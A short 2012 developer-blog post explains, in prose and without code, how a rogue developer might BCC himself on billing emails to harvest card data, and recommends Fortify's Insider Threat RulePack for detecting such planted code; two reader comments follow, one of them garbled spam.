A web developer’s diary

July 11, 2012

Insider Threat – Detect an insider’s job

Filed under: PHP — Celia @ 4:13 am

In our application security engagements, we frequently look out for security loopholes that are present in the application source code. Most of these loopholes happen because of certain assumptions in the application architecture, high level design and implementation. But, there are certain loopholes that are left in the application source code intentionally. Because of this reason, these inside jobs are termed as more malicious.

For example, let’s say that the application has a mail routine and sends billing details (credit card information) to the invoice admin. What if, an employee working in the development team, adds his email address to the mail routine so that he can know the credit card numbers and the transactions for some financial gain?. Every time, the invoice admin receives an email, this employee would also receive that information in BCC. Since he is in BCC list, invoice admin would not notice it. The security consultant might not notice this as he might think of this as a functional requirement.

For this reason, Fortify has come up with a rulepack called ‘Insider Threat RulePack’. The functionality of this rulepack is

1) Email Spying
2) Detecting Logic Bombs in the code.
3) Detecting Nefarious Communication
4) Detecting Backdoors.
5) Dynamic Code injection etc.

This rulepack makes it easier for the security consultant to detect malicious code left intentionally in the source code.

More on this rulepack can be found here.



  1. I personally question why you named this particular blog, “Insider Threat – Detect an
    insiders job A web developers diary”. Either way I actually enjoyed the
    article!Thanks for your effort-Charley

    Comment by http://tinyurl.com/tomaeddy15406 — February 7, 2013 @ 6:42 pm | Reply

  2. u0e1cu0e21u0e40u0e1eu0e34u0e48u0e07u0e0bu0e37u0e49u0e2d nokia e71 u0e21u0e32 u0e2du0e22u0e32u0e01u0e08u0e30u0e2au0e2du0e1au0e16u0e32u0e21u0e40u0e23u0e Click http://s.intmainreturn0.com/people3091630

    Comment by fowlerkirkland9033 — April 9, 2016 @ 8:34 am | Reply

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.

%d bloggers like this: